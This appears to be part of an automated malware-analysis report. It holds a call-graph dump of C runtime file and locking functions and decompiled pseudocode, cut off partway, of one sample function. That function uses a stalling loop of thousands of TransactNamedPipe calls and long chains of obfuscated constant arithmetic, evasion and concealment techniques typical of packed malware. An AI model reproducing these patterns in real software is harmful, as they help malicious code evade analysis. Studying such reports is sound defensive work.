calls 9898->9899 9899->9900 9900->9872 9901->9865 9903 409013 LeaveCriticalSection 9902->9903 9904 408ff4 9902->9904 9903->9750 9904->9903 9905 408ffb 9904->9905 9908 407596 LeaveCriticalSection 9905->9908 9907 409010 9907->9750 9908->9907 9910 408fd4 EnterCriticalSection 9909->9910 9911 408fbe 9909->9911 9910->9315 9912 407670 __lock 68 API calls 9911->9912 9913 408fc7 9912->9913 9913->9315 9915 4066e3 _puts 9914->9915 9918 40901f 9915->9918 9917 4066ee 9917->9316 9919 409042 LeaveCriticalSection 9918->9919 9920 40902f 9918->9920 9919->9917 9923 407596 LeaveCriticalSection 9920->9923 9922 40903f 9922->9917 9923->9922 9926 406537 _fprintf 9924->9926 9925 40654a 9927 40747b __openfile 68 API calls 9925->9927 9926->9925 9928 40657f 9926->9928 9929 40654f 9927->9929 9943 4095f8 9928->9943 9931 409867 __openfile 6 API calls 9929->9931 9933 40655f @_EH4_CallFilterFunc@8 _fprintf 9931->9933 9932 406584 9934 406598 9932->9934 9935 40658b 9932->9935 9933->9330 9937 4065bf 9934->9937 9938 40659f 9934->9938 9936 40747b __openfile 68 API calls 9935->9936 9936->9933 9961 40932f 9937->9961 9939 40747b __openfile 68 API calls 9938->9939 9939->9933 9944 409604 _fprintf 9943->9944 9945 407670 __lock 68 API calls 9944->9945 9956 409612 9945->9956 9946 409687 9986 409727 9946->9986 9947 40968e 9948 40d677 __malloc_crt 68 API calls 9947->9948 9951 409698 9948->9951 9950 40971c _fprintf 9950->9932 9951->9946 9952 40c782 __getstream InitializeCriticalSectionAndSpinCount 9951->9952 9955 4096bd 9952->9955 9953 4075ad __mtinitlocknum 68 API calls 9953->9956 9954 408fb1 _puts 69 API calls 9954->9956 9957 4096c8 9955->9957 9958 4096db EnterCriticalSection 9955->9958 9956->9946 9956->9947 9956->9953 9956->9954 9960 40901f __getstream 2 API calls 9956->9960 9959 40617d __getstream 68 API calls 9957->9959 9958->9946 9959->9946 9960->9956 9962 409351 9961->9962 9963 409365 9962->9963 9975 409384 9962->9975 9964 40747b __openfile 68 API calls 9963->9964 9965 40936a 9964->9965 9968 409867 __openfile 6 API calls 9965->9968 9966 4095b1 9996 40fa90 9966->9996 9967 409597 9969 40747b __openfile 68 API calls 9967->9969 9972 4065ca 9968->9972 9971 40959c 9969->9971 9973 409867 __openfile 6 API calls 9971->9973 9983 4065e5 9972->9983 9973->9972 9975->9967 9982 409541 9975->9982 9990 40fe5f 9975->9990 9979 40fcdb __fassign 103 API calls 9980 40955a 9979->9980 9981 40fcdb __fassign 103 API calls 9980->9981 9980->9982 9981->9982 9982->9966 9982->9967 9984 408fe3 __fsopen 2 API calls 9983->9984 9985 4065ed 9984->9985 9985->9933 9989 407596 LeaveCriticalSection 9986->9989 9988 40972e 9988->9950 9989->9988 9999 40fcf5 9990->9999 9992 40950c 9992->9967 9993 40fcdb 9992->9993 10012 40fab0 9993->10012 10052 40f9c4 9996->10052 9998 40faab 9998->9972 10000 40fd0c 9999->10000 10003 40fd05 _strncmp 9999->10003 10001 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10000->10001 10002 40fd18 10001->10002 10002->10003 10004 40fd76 10002->10004 10005 40fd4b 10002->10005 10003->9992 10004->10003 10007 40747b __openfile 68 API calls 10004->10007 10006 40747b __openfile 68 API calls 10005->10006 10008 40fd50 10006->10008 10009 40fd83 10007->10009 10010 409867 __openfile 6 API calls 10008->10010 10011 409867 __openfile 6 API calls 10009->10011 10010->10003 10011->10003 10013 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10012->10013 10014 40fac4 10013->10014 10015 40fae6 10014->10015 10016 40fb0c 10014->10016 10026 40953a 10014->10026 10027 412de8 10015->10027 10018 40fb11 10016->10018 10019 40fb3f 10016->10019 10020 40747b __openfile 68 API calls 10018->10020 10021 40747b __openfile 68 API calls 10019->10021 10019->10026 10022 40fb16 10020->10022 10023 40fb4c 10021->10023 10024 409867 __openfile 6 API calls 10022->10024 10025 409867 __openfile 6 API calls 10023->10025 10024->10026 10025->10026 10026->9979 10026->9982 10028 412df8 10027->10028 10033 412e2a 10027->10033 10030 412dfd 10028->10030 10028->10033 10031 40747b __openfile 68 API calls 10030->10031 10032 412e02 10031->10032 10035 409867 __openfile 6 API calls 10032->10035 10036 412cf6 10033->10036 10034 412e12 10034->10026 10035->10034 10037 412d0c 10036->10037 10048 412d31 ___ascii_strnicmp 10036->10048 10038 40904e _LocaleUpdate::_LocaleUpdate 78 API calls 10037->10038 10039 412d17 10038->10039 10040 412d1c 10039->10040 10041 412d51 10039->10041 10042 40747b __openfile 68 API calls 10040->10042 10043 412d5b 10041->10043 10051 412d83 10041->10051 10044 412d21 10042->10044 10045 40747b __openfile 68 API calls 10043->10045 10046 409867 __openfile 6 API calls 10044->10046 10047 412d60 10045->10047 10046->10048 10049 409867 __openfile 6 API calls 10047->10049 10048->10034 10049->10048 10050 412e7d 103 API calls __tolower_l 10050->10051 10051->10048 10051->10050 10055 40f9d0 _fprintf 10052->10055 10053 40f9e3 10054 40747b __openfile 68 API calls 10053->10054 10056 40f9e8 10054->10056 10055->10053 10057 40fa21 10055->10057 10058 409867 __openfile 6 API calls 10056->10058 10063 40f2a5 10057->10063 10062 40f9f7 _fprintf 10058->10062 10062->9998 10064 40f2ca 10063->10064 10123 412cbd 10064->10123 10067 40973f __invoke_watson 10 API calls 10072 40f2f5 10067->10072 10068 40f32e 10069 40748e __close 68 API calls 10068->10069 10070 40f333 10069->10070 10071 40747b __openfile 68 API calls 10070->10071 10073 40f33d 10071->10073 10072->10068 10075 40f3ee 10072->10075 10074 409867 __openfile 6 API calls 10073->10074 10103 40f34c 10074->10103 10129 40e4d0 10075->10129 10077 40f490 10078 40f4b1 CreateFileA 10077->10078 10079 40f497 10077->10079 10081 40f54b GetFileType 10078->10081 10082 40f4de 10078->10082 10080 40748e __close 68 API calls 10079->10080 10085 40f49c 10080->10085 10083 40f558 GetLastError 10081->10083 10084 40f59c 10081->10084 10086 40f517 GetLastError 10082->10086 10089 40f4f2 CreateFileA 10082->10089 10087 4074a1 __dosmaperr 68 API calls 10083->10087 10147 40e28b 10084->10147 10088 40747b __openfile 68 API calls 10085->10088 10090 4074a1 __dosmaperr 68 API calls 10086->10090 10092 40f581 CloseHandle 10087->10092 10091 40f4a6 10088->10091 10089->10081 10089->10086 10090->10091 10095 40747b __openfile 68 API calls 10091->10095 10092->10091 10094 40f58f 10092->10094 10096 40747b __openfile 68 API calls 10094->10096 10095->10103 10096->10091 10097 40f7da 10100 40f947 CloseHandle CreateFileA 10097->10100 10097->10103 10102 40f972 GetLastError 10100->10102 10100->10103 10104 4074a1 __dosmaperr 68 API calls 10102->10104 10119 40fa62 10103->10119 10106 40f97e 10104->10106 10105 40748e __close 68 API calls 10114 40f630 10105->10114 10212 40e30c 10106->10212 10108 40b7bb 70 API calls __lseek_nolock 10108->10114 10110 4124d6 78 API calls __read_nolock 10110->10114 10112 408caa __locking 102 API calls 10112->10114 10113 40f842 10115 412a98 __close_nolock 71 API calls 10113->10115 10114->10097 10114->10108 10114->10110 10114->10112 10114->10113 10118 40e0be 70 API calls __lseeki64_nolock 10114->10118 10166 412a98 10114->10166 10181 412320 10114->10181 10116 40f849 10115->10116 10117 40747b __openfile 68 API calls 10116->10117 10117->10103 10118->10114 10120 40fa67 10119->10120 10121 40fa8e 10119->10121 10229 40e4a9 LeaveCriticalSection 10120->10229 10121->10062 10124 412ccc 10123->10124 10126 40f2e6 10123->10126 10125 40747b __openfile 68 API calls 10124->10125 10127 412cd1 10125->10127 10126->10067 10126->10072 10128 409867 __openfile 6 API calls 10127->10128 10128->10126 10130 40e4dc _fprintf 10129->10130 10131 4075ad __mtinitlocknum 68 API calls 10130->10131 10132 40e4ec 10131->10132 10133 407670 __lock 68 API calls 10132->10133 10134 40e4f1 _fprintf 10132->10134 10143 40e500 10133->10143 10134->10077 10135 40e643 10224 40e661 10135->10224 10136 40e5d9 10138 40d6bc __calloc_crt 68 API calls 10136->10138 10141 40e5e2 10138->10141 10139 40e581 EnterCriticalSection 10142 40e591 LeaveCriticalSection 10139->10142 10139->10143 10140 407670 __lock 68 API calls 10140->10143 10141->10135 10144 40e409 ___lock_fhandle 69 API calls 10141->10144 10142->10143 10143->10135 10143->10136 10143->10139 10143->10140 10145 40c782 __getstream InitializeCriticalSectionAndSpinCount 10143->10145 10221 40e5a3 10143->10221 10144->10135 10145->10143 10148 40e2f2 10147->10148 10149 40e299 10147->10149 10150 40747b __openfile 68 API calls 10148->10150 10149->10148 10152 40e2bd 10149->10152 10151 40e2f7 10150->10151 10153 40748e __close 68 API calls 10151->10153 10154 40e2e8 10152->10154 10155 40e2e2 SetStdHandle 10152->10155 10153->10154 10154->10097 10154->10114 10156 40b7bb 10154->10156 10155->10154 10157 40e392 __chsize_nolock 68 API calls 10156->10157 10158 40b7ca 10157->10158 10159 40b7e0 SetFilePointer 10158->10159 10160 40b7d0 10158->10160 10162 40b7f7 GetLastError 10159->10162 10163 40b7ff 10159->10163 10161 40747b __openfile 68 API calls 10160->10161 10164 40b7d5 10161->10164 10162->10163 10163->10164 10165 4074a1 __dosmaperr 68 API calls 10163->10165 10164->10105 10164->10114 10165->10164 10167 40e392 __chsize_nolock 68 API calls 10166->10167 10169 412aa8 10167->10169 10168 412afe 10171 40e30c __free_osfhnd 69 API calls 10168->10171 10169->10168 10170 412adc 10169->10170 10172 40e392 __chsize_nolock 68 API calls 10169->10172 10170->10168 10173 40e392 __chsize_nolock 68 API calls 10170->10173 10174 412b06 10171->10174 10176 412ad3 10172->10176 10177 412ae8 CloseHandle 10173->10177 10175 412b28 10174->10175 10178 4074a1 __dosmaperr 68 API calls 10174->10178 10175->10114 10179 40e392 __chsize_nolock 68 API calls 10176->10179 10177->10168 10180 412af4 GetLastError 10177->10180 10178->10175 10179->10170 10180->10168 10182 40e0be __lseeki64_nolock 70 API calls 10181->10182 10183 41233f 10182->10183 10184 4123a2 10183->10184 10186 40e0be __lseeki64_nolock 70 API calls 10183->10186 10185 40747b __openfile 68 API calls 10184->10185 10187 4123ad 10184->10187 10185->10187 10190 41235b 10186->10190 10187->10114 10188 41243d 10191 4124a6 10188->10191 10195 40e0be __lseeki64_nolock 70 API calls 10188->10195 10189 412381 GetProcessHeap HeapAlloc 10192 41239d 10189->10192 10201 4123b4 __setmode_nolock 10189->10201 10190->10184 10190->10188 10190->10189 10191->10184 10193 40e0be __lseeki64_nolock 70 API calls 10191->10193 10194 40747b __openfile 68 API calls 10192->10194 10193->10184 10194->10184 10196 412456 10195->10196 10196->10184 10197 40e392 __chsize_nolock 68 API calls 10196->10197 10198 41246c SetEndOfFile 10197->10198 10198->10191 10200 412489 10198->10200 10199 408577 __write_nolock 100 API calls 10199->10201 10202 40747b __openfile 68 API calls 10200->10202 10201->10199 10203 412420 10201->10203 10205 4123f7 __setmode_nolock 10201->10205 10204 41248e 10202->10204 10206 40748e __close 68 API calls 10203->10206 10207 40748e __close 68 API calls 10204->10207 10211 412405 GetProcessHeap HeapFree 10205->10211 10209 412425 10206->10209 10208 412499 GetLastError 10207->10208 10208->10191 10209->10205 10210 40747b __openfile 68 API calls 10209->10210 10210->10205 10211->10191 10213 40e378 10212->10213 10214 40e31d 10212->10214 10215 40747b __openfile 68 API calls 10213->10215 10214->10213 10219 40e348 10214->10219 10216 40e37d 10215->10216 10217 40748e __close 68 API calls 10216->10217 10218 40e36e 10217->10218 10218->10103 10219->10218 10220 40e368 SetStdHandle 10219->10220 10220->10218 10227 407596 LeaveCriticalSection 10221->10227 10223 40e5aa 10223->10143 10228 407596 LeaveCriticalSection 10224->10228 10226 40e668 10226->10134 10227->10223 10228->10226 10229->10121 10231 4063e0 _fprintf 10230->10231 10232 407670 __lock 68 API calls 10231->10232 10233 4063ef 10232->10233 10234 406487 10233->10234 10236 408fb1 _puts 69 API calls 10233->10236 10239 40638c 106 API calls __fflush_nolock 10233->10239 10253 406476 10233->10253 10256 4064a5 10234->10256 10236->10233 10237 406493 _fprintf 10237->9343 10239->10233 10241 4063a2 10240->10241 10242 406399 10240->10242 10244 406324 __flush 102 API calls 10241->10244 10243 4063d4 _flsall 106 API calls 10242->10243 10245 40639f 10243->10245 10246 4063a8 10244->10246 10250 4064f7 10245->10250 10246->10245 10247 408d86 __fileno 68 API calls 10246->10247 10248 4063c1 10247->10248 10260 408db8 10248->10260 10251 408fe3 __fsopen 2 API calls 10250->10251 10252 4064ff 10251->10252 10252->9343 10254 40901f __getstream 2 API calls 10253->10254 10255 406484 10254->10255 10255->10233 10259 407596 LeaveCriticalSection 10256->10259 10258 4064ac 10258->10237 10259->10258 10261 408dc4 _fprintf 10260->10261 10262 408dcc 10261->10262 10263 408ddf 10261->10263 10265 40747b __openfile 68 API calls 10262->10265 10264 408ded 10263->10264 10268 408e27 10263->10268 10266 40747b __openfile 68 API calls 10264->10266 10272 408dd1 _fprintf 10265->10272 10267 408df2 10266->10267 10269 409867 __openfile 6 API calls 10267->10269 10270 40e409 ___lock_fhandle 69 API calls 10268->10270 10269->10272 10271 408e2d 10270->10271 10273 408e66 10271->10273 10275 40e392 __chsize_nolock 68 API calls 10271->10275 10272->10245 10274 40747b __openfile 68 API calls 10273->10274 10276 408e70 10274->10276 10277 408e42 FlushFileBuffers 10275->10277 10282 408e8f 10276->10282 10278 408e59 10277->10278 10279 408e4e GetLastError 10277->10279 10278->10276 10281 40748e __close 68 API calls 10278->10281 10279->10278 10281->10273 10285 40e4a9 LeaveCriticalSection 10282->10285 10284 408e97 10284->10272 10285->10284 10287 406ac9 10286->10287 10288 406ab9 10286->10288 10290 406adb 10287->10290 10301 40b90c 10287->10301 10289 40747b __openfile 68 API calls 10288->10289 10297 406abe 10289->10297 10292 406324 __flush 102 API calls 10290->10292 10293 406ae9 10292->10293 10294 408d86 __fileno 68 API calls 10293->10294 10295 406b1b 10294->10295 10318 40b830 10295->10318 10298 406bae 10297->10298 10299 408fe3 __fsopen 2 API calls 10298->10299 10300 406bb6 10299->10300 10300->9357 10302 40b93f 10301->10302 10303 40b91f 10301->10303 10304 408d86 __fileno 68 API calls 10302->10304 10305 40747b __openfile 68 API calls 10303->10305 10307 40b945 10304->10307 10306 40b924 10305->10306 10308 409867 __openfile 6 API calls 10306->10308 10309 40b830 __locking 72 API calls 10307->10309 10317 40b934 10308->10317 10310 40b95a 10309->10310 10311 40b9ce 10310->10311 10313 40b989 10310->10313 10310->10317 10312 40747b __openfile 68 API calls 10311->10312 10312->10317 10314 40b830 __locking 72 API calls 10313->10314 10313->10317 10315 40ba29 10314->10315 10316 40b830 __locking 72 API calls 10315->10316 10315->10317 10316->10317 10317->10290 10319 40b83c _fprintf 10318->10319 10320 40b844 10319->10320 10321 40b85f 10319->10321 10322 40748e __close 68 API calls 10320->10322 10323 40b86d 10321->10323 10326 40b8ae 10321->10326 10324 40b849 10322->10324 10325 40748e __close 68 API calls 10323->10325 10327 40747b __openfile 68 API calls 10324->10327 10328 40b872 10325->10328 10329 40e409 ___lock_fhandle 69 API calls 10326->10329 10330 40b851 _fprintf 10327->10330 10331 40747b __openfile 68 API calls 10328->10331 10332 40b8b4 10329->10332 10330->10297 10333 40b879 10331->10333 10334 40b8c1 10332->10334 10335 40b8d7 10332->10335 10336 409867 __openfile 6 API calls 10333->10336 10337 40b7bb __lseek_nolock 70 API calls 10334->10337 10338 40747b __openfile 68 API calls 10335->10338 10336->10330 10339 40b8cf 10337->10339 10340 40b8dc 10338->10340 10343 40b902 10339->10343 10341 40748e __close 68 API calls 10340->10341 10341->10339 10346 40e4a9 LeaveCriticalSection 10343->10346 10345 40b90a 10345->10330 10346->10345 10348 40606d 10347->10348 10351 407364 __ctrlfp __floor_pentium4 10347->10351 10349 40609e 10348->10349 10348->10351 10356 4060e8 10349->10356 10358 4070a0 10349->10358 10350 4073d1 __floor_pentium4 10355 4073be __ctrlfp 10350->10355 10374 40d341 10350->10374 10351->10350 10354 4073ae 10351->10354 10351->10355 10367 40d2ec 10354->10367 10355->9360 10356->9360 10359 4070e1 10358->10359 10360 4070d6 10358->10360 10362 4071b8 10359->10362 10363 407174 10359->10363 10364 407132 10359->10364 10361 40bb24 __decode_pointer 6 API calls 10360->10361 10361->10359 10362->10363 10365 40747b __openfile 68 API calls 10362->10365 10363->10356 10364->10363 10366 40747b __openfile 68 API calls 10364->10366 10365->10363 10366->10363 10368 40d322 10367->10368 10369 40d2fa 10367->10369 10370 40747b __openfile 68 API calls 10368->10370 10385 40d24c 10369->10385 10373 40d327 __ctrlfp 10370->10373 10372 40d31d 10372->10355 10373->10355 10375 40d377 __handle_exc 10374->10375 10377 40d39d __except1 10375->10377 10400 40cfe6 10375->10400 10378 40d3df 10377->10378 10380 40d3b8 10377->10380 10379 40d1eb __except1 68 API calls 10378->10379 10382 40d3da __ctrlfp 10379->10382 10381 40d24c __umatherr 68 API calls 10380->10381 10381->10382 10383 40dac5 __invoke_watson 5 API calls 10382->10383 10384 40d403 10383->10384 10384->10355 10386 40d256 10385->10386 10387 40d2cf __ctrlfp 10386->10387 10389 40d271 __umatherr __ctrlfp 10386->10389 10388 40d1eb __except1 68 API calls 10387->10388 10390 40d2e4 10388->10390 10391 40d2bf 10389->10391 10393 40d1eb 10389->10393 10390->10372 10391->10372 10394 40d1f6 10393->10394 10395 40d20b 10393->10395 10397 40d210 10394->10397 10398 40747b __openfile 68 API calls 10394->10398 10396 40747b __openfile 68 API calls 10395->10396 10396->10397 10397->10391 10399 40d203 10398->10399 10399->10391 10403 40cd0a 10400->10403 10404 40cd31 __raise_exc_ex 10403->10404 10405 40cf24 RaiseException 10404->10405 10406 40cf3d 10405->10406 10406->10377 10408 40b5fc 10407->10408 10411 40b5db 10407->10411 10408->9380 10409 40b5e7 10410 40747b __openfile 68 API calls 10409->10410 10412 40b5ec 10410->10412 10411->10408 10411->10409 10414 40b61a _realloc 10411->10414 10413 409867 __openfile 6 API calls 10412->10413 10413->10408 10414->10408 10415 40b465 __flsbuf 102 API calls 10414->10415 10416 406324 __flush 102 API calls 10414->10416 10417 408d86 __fileno 68 API calls 10414->10417 10418 408caa __locking 102 API calls 10414->10418 10415->10414 10416->10414 10417->10414 10418->10414 10420 408d86 __fileno 68 API calls 10419->10420 10421 40b475 10420->10421 10422 40b480 10421->10422 10423 40b497 10421->10423 10424 40747b __openfile 68 API calls 10422->10424 10425 40b49b 10423->10425 10434 40b4a8 _puts 10423->10434 10433 40b485 10424->10433 10426 40747b __openfile 68 API calls 10425->10426 10426->10433 10427 40b509 10428 40b598 10427->10428 10429 40b518 10427->10429 10430 408caa __locking 102 API calls 10428->10430 10431 40b52f 10429->10431 10436 40b54c 10429->10436 10430->10433 10432 408caa __locking 102 API calls 10431->10432 10432->10433 10433->9376 10434->10427 10434->10433 10435 40e05a __flsbuf 68 API calls 10434->10435 10437 40b4fe 10434->10437 10435->10437 10436->10433 10447 40e143 10436->10447 10437->10427 10444 411040 10437->10444 10441 406a9b _puts 10440->10441 10442 40901f __getstream 2 API calls 10441->10442 10443 406aa6 10442->10443 10443->9370 10445 40d677 __malloc_crt 68 API calls 10444->10445 10446 411055 10445->10446 10446->10427 10448 40e14f _fprintf 10447->10448 10449 40e160 10448->10449 10450 40e17c 10448->10450 10452 40748e __close 68 API calls 10449->10452 10451 40e18a 10450->10451 10453 40e1ab 10450->10453 10454 40748e __close 68 API calls 10451->10454 10455 40e165 10452->10455 10457 40e1f1 10453->10457 10458 40e1cb 10453->10458 10456 40e18f 10454->10456 10459 40747b __openfile 68 API calls 10455->10459 10461 40747b __openfile 68 API calls 10456->10461 10460 40e409 ___lock_fhandle 69 API calls 10457->10460 10462 40748e __close 68 API calls 10458->10462 10471 40e16d _fprintf 10459->10471 10463 40e1f7 10460->10463 10464 40e196 10461->10464 10465 40e1d0 10462->10465 10466 40e220 10463->10466 10467 40e204 10463->10467 10468 409867 __openfile 6 API calls 10464->10468 10469 40747b __openfile 68 API calls 10465->10469 10473 40747b __openfile 68 API calls 10466->10473 10472 40e0be __lseeki64_nolock 70 API calls 10467->10472 10468->10471 10470 40e1d7 10469->10470 10474 409867 __openfile 6 API calls 10470->10474 10471->10433 10475 40e215 10472->10475 10476 40e225 10473->10476 10474->10471 10479 40e252 10475->10479 10477 40748e __close 68 API calls 10476->10477 10477->10475 10482 40e4a9 LeaveCriticalSection 10479->10482 10481 40e25a 10481->10471 10482->10481 10484 406d38 _fprintf 10483->10484 10485 407670 __lock 68 API calls 10484->10485 10486 406d3f 10485->10486 10487 406df8 __initterm 10486->10487 10489 40bb24 __decode_pointer 6 API calls 10486->10489 10500 406e43 10487->10500 10491 406d76 10489->10491 10491->10487 10494 40bb24 __decode_pointer 6 API calls 10491->10494 10493 406e40 _fprintf 10493->8753 10498 406d8b 10494->10498 10495 406e37 10496 406c3c _doexit 3 API calls 10495->10496 10496->10493 10497 40bb1b 7 API calls _doexit 10497->10498 10498->10487 10498->10497 10499 40bb24 6 API calls __decode_pointer 10498->10499 10499->10498 10501 406e24 10500->10501 10502 406e49 10500->10502 10501->10493 10504 407596 LeaveCriticalSection 10501->10504 10505 407596 LeaveCriticalSection 10502->10505 10504->10495 10505->10501 10506 40bb1b 10507 40baa9 __encode_pointer 7 API calls 10506->10507 10508 40bb22 10507->10508

                        Control-flow Graph

                        C-Code - Quality: 80%
                        			E004058A1(void* __fp0) {
                        				signed int _v16;
                        				void* _v20;
                        				signed int _v36;
                        				long _v52;
                        				intOrPtr _v56;
                        				char _v60;
                        				intOrPtr _v64;
                        				intOrPtr _v68;
                        				intOrPtr _v72;
                        				intOrPtr _v76;
                        				intOrPtr _v80;
                        				intOrPtr _v84;
                        				intOrPtr _v88;
                        				intOrPtr _v92;
                        				intOrPtr _v96;
                        				intOrPtr _v100;
                        				intOrPtr _v104;
                        				intOrPtr _v108;
                        				intOrPtr _v112;
                        				intOrPtr _v116;
                        				intOrPtr _v120;
                        				intOrPtr _v124;
                        				intOrPtr _v128;
                        				intOrPtr _v132;
                        				intOrPtr _v136;
                        				intOrPtr _v140;
                        				intOrPtr _v144;
                        				intOrPtr _v148;
                        				intOrPtr _v152;
                        				intOrPtr _v156;
                        				intOrPtr _v160;
                        				intOrPtr _v164;
                        				intOrPtr _v168;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				intOrPtr _t365;
                        				intOrPtr* _t381;
                        				intOrPtr* _t384;
                        				void* _t387;
                        				void* _t390;
                        				void* _t394;
                        				void* _t395;
                        				void* _t397;
                        				signed int _t403;
                        				signed int _t404;
                        				void* _t405;
                        				intOrPtr* _t406;
                        				void* _t412;
                        
                        				_t412 = __fp0;
                        				_t404 = _t403 & 0xfffffff8;
                        				_push(0xffffffff);
                        				_push(E00416C51);
                        				_push( *[fs:0x0]);
                        				 *[fs:0x0] = _t404;
                        				_t405 = _t404 - 0x9c;
                        				_t397 = 0xe3a7;
                        				do {
                        					GetLastError();
                        					TransactNamedPipe(0, 0, 0, 0, 0, 0, 0); // executed
                        					_t397 = _t397 - 1;
                        				} while (_t397 != 0);
                        				_v76 = 0x812ae72;
                        				_v108 = 0x374ff37f;
                        				_v144 = 0x53039ceb;
                        				_v88 = 0x26f83b54;
                        				_v152 = 0x2c845f70;
                        				_v64 = 0x664b1a94;
                        				_v56 = 0x2038cb82;
                        				_v104 = 0x18f219b6;
                        				_v124 = 0x52833b47;
                        				_v92 = 0x24568fa0;
                        				_v112 = 0xc292fcb;
                        				_v68 = 0x310707b5;
                        				_v60 = 0x7eccb7a1;
                        				_v128 = 0x51beb4a8;
                        				_v148 = 0x23570ec5;
                        				_v96 = 0x13bb2b31;
                        				_v140 = 0x41e4b1e5;
                        				_v164 = 0x29829f26;
                        				_v120 = 0x6640d5e5;
                        				_v100 = 0x2b35ebd4;
                        				_v72 = 0x304a9f21;
                        				_v156 = 0x42da8ef7;
                        				_v116 = 0x6e9395e5;
                        				_v160 = 0x4663bccc;
                        				_v168 = 0xd57d1e7;
                        				_v80 = 0x58efb44f;
                        				_v136 = 0x146317d6;
                        				_v84 = 0x1f0b1819;
                        				_v132 = 0x3d33338;
                        				_v76 = _v76 + 0x653b0d1e;
                        				_v76 = _v76 - 0x1af0d3ea;
                        				_v76 = _v76 + 0x398a55da;
                        				_v144 = _v144 - 0x684b7b80;
                        				_v76 = _v76 - 0x230a939f;
                        				_v144 = _v144 + 0x59c55b6e;
                        				_v144 = _v144 + 0x3e4b2e5f;
                        				_v144 = _v144 - 0x533debbd;
                        				_v76 = _v76 - 0x4694b7b0;
                        				_v108 = _v108 + 0x64d2b886;
                        				_v144 = _v144 + 0x24a8487e;
                        				_v108 = _v108 + 0x346d58dd;
                        				_v76 = _v76 - 0x41db75c6;
                        				_v108 = _v108 + 0x6d280e28;
                        				_v108 = _v108 - 0x7da0931;
                        				_v76 = _v76 + 0x694bfc10;
                        				_v108 = _v108 - 0xc4a1537;
                        				_v76 = _v76 - 0x37c54368;
                        				_v144 = _v144 - 0x2c7f8551;
                        				_v76 = _v76 - 0x3fa9e949;
                        				_v108 = _v108 + 0x791148db;
                        				_v108 = _v108 + 0x138bf3c6;
                        				_v144 = _v144 - 0x61a2b58f;
                        				_v108 = _v108 - 0x208df69e;
                        				_v144 = _v144 - 0x497a7bc8;
                        				_v108 = _v108 - 0x1af05f9e;
                        				_v108 = _v108 - 0x6b3af13b;
                        				_v144 = _v144 + 0x6fb1c642;
                        				_v108 = _v108 - 0x994df12;
                        				_v76 = _v76 - 0x7867e843;
                        				_v88 = _v88 + 0x45a20138;
                        				_v144 = _v144 - 0x4d6b8727;
                        				_v144 = _v144 + 0x42d16f3c;
                        				_v144 = _v144 - 0x4aaeb358;
                        				_v144 = _v144 - 0x5c1aa042;
                        				_v152 = _v152 + 0x49af1289;
                        				_v144 = _v144 + 0x437c985f;
                        				_v108 = _v108 + 0x79b9c2a2;
                        				_v56 = _v56 + 0x5b4a1592;
                        				_v88 = _v88 - 0x2ec83452;
                        				_v144 = _v144 + 0x437869a5;
                        				_v64 = _v64 + 0x3b025366;
                        				_v88 = _v88 - 0xd43d2d;
                        				_v76 = _v76 + 0x7d747d8a;
                        				_v104 = _v104 + 0x4883c890;
                        				_v152 = _v152 + 0x289bc367;
                        				_v76 = _v76 + 0x798c77cb;
                        				_v76 = _v76 - 0x56be1fbb;
                        				_v92 = _v92 + 0xdf5b30d;
                        				_v92 = _v92 + 0x37ed99c9;
                        				_v56 = _v56 - 0x7715dacd;
                        				_v88 = _v88 - 0x31376674;
                        				_v124 = _v124 - 0x636d4c79;
                        				_v76 = _v76 + 0x35025f94;
                        				_v76 = _v76 + 0x6e30b30b;
                        				_v64 = _v64 + 0x14dc745e;
                        				_v68 = _v68 - 0x169f63ef;
                        				_v76 = _v76 + 0x7c02df99;
                        				_v56 = _v56 - 0x2e59662f;
                        				_v92 = _v92 + 0x155c59a4;
                        				_v56 = _v56 + 0x7b75a504;
                        				_v112 = _v112 + 0x219f47f3;
                        				_v92 = _v92 - 0x67a552b;
                        				_v108 = _v108 + 0x4a2137a8;
                        				_v68 = _v68 + 0xc585413;
                        				_v88 = _v88 - 0x3a14e483;
                        				_v144 = _v144 + 0x5b524b4e;
                        				_v60 = _v60 + 0x34fb5402;
                        				_v92 = _v92 - 0x34bffa78;
                        				_v124 = _v124 + 0x6aa55f44;
                        				_v76 = _v76 + 0xf4e48f;
                        				_v104 = _v104 - 0x2cd6d396;
                        				_v88 = _v88 - 0x45adcf56;
                        				_v112 = _v112 + 0x46ab1204;
                        				_v112 = _v112 - 0x2d00c364;
                        				_v68 = _v68 + 0x7599e045;
                        				_v88 = _v88 + 0x74eabc8d;
                        				_v112 = _v112 + 0x7bf0b077;
                        				_v88 = _v88 + 0x5b716b01;
                        				_v104 = _v104 - 0x4d38819a;
                        				_v108 = _v108 + 0x278eda90;
                        				_v60 = _v60 + 0x1f444cf3;
                        				_v60 = _v60 + 0x1092cade;
                        				_v96 = _v96 + 0x3a66ef6d;
                        				_v88 = _v88 - 0x6fe2cb96;
                        				_v108 = _v108 - 0x173e588a;
                        				_v108 = _v108 + 0x27245b35;
                        				_v120 = _v120 + 0x441a636b;
                        				_v60 = _v60 + 0x5ba43329;
                        				_v164 = _v164 + 0x2901033c;
                        				_v128 = _v128 + 0x7b88cf48;
                        				_v76 = _v76 + 0x67a8963c;
                        				_v144 = _v144 - 0x7d8997bf;
                        				_v104 = _v104 - 0x626ab517;
                        				_v112 = _v112 + 0x36ad816d;
                        				_v88 = _v88 + 0x74cb5282;
                        				_v92 = _v92 - 0x7230715d;
                        				_v152 = _v152 - 0x597545ed;
                        				_v164 = _v164 - 0x3ec80e96;
                        				_v108 = _v108 - 0x7fd0260;
                        				_v140 = _v140 - 0x25000d89;
                        				_v164 = _v164 + 0x17d0d6ee;
                        				_v96 = _v96 - 0x538210b7;
                        				_v108 = _v108 - 0x233dd73b;
                        				_v100 = _v100 + 0x30220508;
                        				_v76 = _v76 - 0x1cee596;
                        				_v92 = _v92 - 0x2b0a7c88;
                        				_v128 = _v128 + 0x4ff17690;
                        				_v68 = _v68 - 0xaf71342;
                        				_v92 = _v92 + 0x7ef27e15;
                        				_v156 = _v156 + 0x47928b6b;
                        				_v108 = _v108 - 0x2c14997d;
                        				_v64 = _v64 + 0xa689404;
                        				_v156 = _v156 - 0xc7d2fed;
                        				_v60 = _v60 + 0x7d990335;
                        				_v156 = _v156 + 0x77640fe7;
                        				_v108 = _v108 + 0x76cee0ec;
                        				_v100 = _v100 - 0x8ece03b;
                        				_v56 = _v56 - 0x2b84348d;
                        				_v64 = _v64 - 0x64f9c0f;
                        				_v108 = _v108 - 0x8418f68;
                        				_v68 = _v68 - 0x3ab9c933;
                        				_v92 = _v92 + 0x32b4df14;
